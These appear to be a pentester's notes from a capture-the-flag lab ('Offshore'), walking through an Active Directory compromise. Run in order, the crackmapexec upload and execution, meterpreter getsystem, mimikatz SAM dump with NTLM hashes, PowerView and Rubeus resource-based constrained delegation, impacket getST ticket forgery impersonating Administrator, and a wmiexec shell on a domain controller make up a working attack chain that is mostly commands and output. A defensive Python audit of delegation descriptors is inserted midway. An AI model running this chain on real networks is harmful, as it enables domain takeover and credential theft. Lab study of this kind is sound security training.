-
joe’s password is empty
-
[3:19 PM]
and he has GenericWrite on dc02
-
[3:20 PM]
so from ws03 I need to exploit RBCD
-
[3:20 PM]
as joe
-
[3:20 PM]
to get into DC02
```bash
proxychains crackmapexec smb 172.16.2.102 -u 'joe' -p '' --put-file prompt.exe 'prompt.exe' 2>/dev/null
proxychains crackmapexec smb 172.16.2.102 -u 'joe' -p '' -x ".\prompt.exe" 2>/dev/null
```
## Meterpreter
```bash
meterpreter > getuid
Server username: DEV\joe
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
## Mimikatz
```bash
mimikatz # lsadump::sam
Domain : WS03
SysKey : 539b95e196e5cc40bcebed509c3ac4f1
Local SID : S-1-5-21-3524167559-3123258524-3282826305
SAMKey : 41a1a9fb42e4dbd1395db78db3945dfd
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003ea (1002)
User : justalocaladmin
Hash NTLM: 9d5c8041317bb80950b9431db921c08a
```
## RBCD with PowerView and Rubeus
```powershell
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# $targetComputer is the DC name; here it is DC02.dev.admin.offshore.com
# example: change $targetComputer to dc.support.htb because we are in management.support.htb
Get-DomainComputer DC02.dev.admin.offshore.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
.\Rubeus.exe hash /password:Summer2018!
[*] Action: Calculate Password Hash(es)
[*] Input password : Summer2018!
[*] rc4_hmac : EF266C6B963C0BB683941032008AD47F
.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:norma.branham /msdsspn:cifs/DC02.dev.admin.offshore.com /ptt
dir \\DC02.dev.admin.offshore.com\C$
```
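A defender-side check for the descriptor written above, added here as an example (not code from the original notes or from PowerView/Rubeus): it decodes the SDDL that ends up in msDS-AllowedToActOnBehalfOfOtherIdentity and flags every trustee SID that is not an approved delegating host. The SID for attackersystem$ is constructed, not a real value from the lab.

```python
import re

# SDDL access-right abbreviations used in AD descriptors -> (name, access-mask bit)
RIGHTS = {
    "CC": ("CREATE_CHILD", 0x1),     "DC": ("DELETE_CHILD", 0x2),
    "LC": ("LIST_CHILDREN", 0x4),    "SW": ("SELF_WRITE", 0x8),
    "RP": ("READ_PROPERTY", 0x10),   "WP": ("WRITE_PROPERTY", 0x20),
    "DT": ("DELETE_TREE", 0x40),     "LO": ("LIST_OBJECT", 0x80),
    "CR": ("CONTROL_ACCESS", 0x100), "SD": ("DELETE", 0x10000),
    "RC": ("READ_CONTROL", 0x20000), "WD": ("WRITE_DAC", 0x40000),
    "WO": ("WRITE_OWNER", 0x80000),
}
# Two-letter well-known SID aliases that SDDL allows in place of a full SID
ALIASES = {"BA": "S-1-5-32-544", "SY": "S-1-5-18"}

# Constructed sample: the SDDL shape PowerView writes above, with a made-up SID for attackersystem$
SAMPLE_SID = "S-1-5-21-1234567890-1234567890-1234567890-1105"
SAMPLE_SDDL = f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{SAMPLE_SID})"

def parse_ace(ace):
    """Decode one '(type;flags;rights;objguid;inhguid;sid)' ACE into a dict."""
    ace_type, flags, rights, _obj, _inh, sid = ace.strip("()").split(";")
    mask, names = 0, []
    if rights.startswith("0x"):                # rights may be a raw hex mask
        mask = int(rights, 16)
    else:                                      # or a run of two-letter codes
        for i in range(0, len(rights), 2):
            name, bit = RIGHTS.get(rights[i:i + 2], (rights[i:i + 2], 0))
            mask |= bit
            names.append(name)
    return {"type": ace_type, "flags": flags, "mask": mask,
            "rights": names, "sid": ALIASES.get(sid, sid)}

def parse_sddl(sddl):
    """Return (owner_sid, [ace, ...]) for an SDDL string with an O: and a D: part."""
    owner = re.search(r"O:(\S+?)(?=D:|G:|S:)", sddl).group(1)
    dacl = re.search(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)", sddl).group(1)
    aces = [parse_ace(a) for a in re.findall(r"\([^)]*\)", dacl)]
    return ALIASES.get(owner, owner), aces

def audit_rbcd(sddl, approved_sids=()):
    """List every allow ACE whose trustee is not an approved delegating host.
    Each hit is a principal that may impersonate users to this computer."""
    _owner, aces = parse_sddl(sddl)
    return [a for a in aces if a["type"] == "A" and a["sid"] not in approved_sids]

if __name__ == "__main__":
    for hit in audit_rbcd(SAMPLE_SDDL):
        print(f"unexpected delegation: {hit['sid']} mask=0x{hit['mask']:X} {hit['rights']}")
```

On a live domain the input is the SDDL form of each computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute; a non-empty DACL on a domain controller that names anything other than a known delegating host is the finding to chase.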

## Getting the machine SPN ticket
```bash
┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples]
└─$ proxychains -f /home/jay/Documents/offshore/DC02/proxychains4.conf python getST.py -spn "cifs/DC02.dev.admin.offshore.com" -impersonate Administrator -dc-ip 172.16.2.6 'dev.admin.offshore.com/attackersystem:Summer2018!'
[proxychains] config file found: /home/jay/Documents/offshore/DC02/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[*] Impersonating Administrator
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[*] Saving ticket in Administrator.ccache
```

## Using the ticket to get the shell
```bash
┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples]
└─$ proxychains -f /home/jay/Documents/offshore/DC02/proxychains4.conf python wmiexec.py dev.admin.offshore.com/Administrator@DC02.dev.admin.offshore.com -no-pass -k
OFFSHORE{l@zy_adm1ns_ru1n_th3_p4rty}
```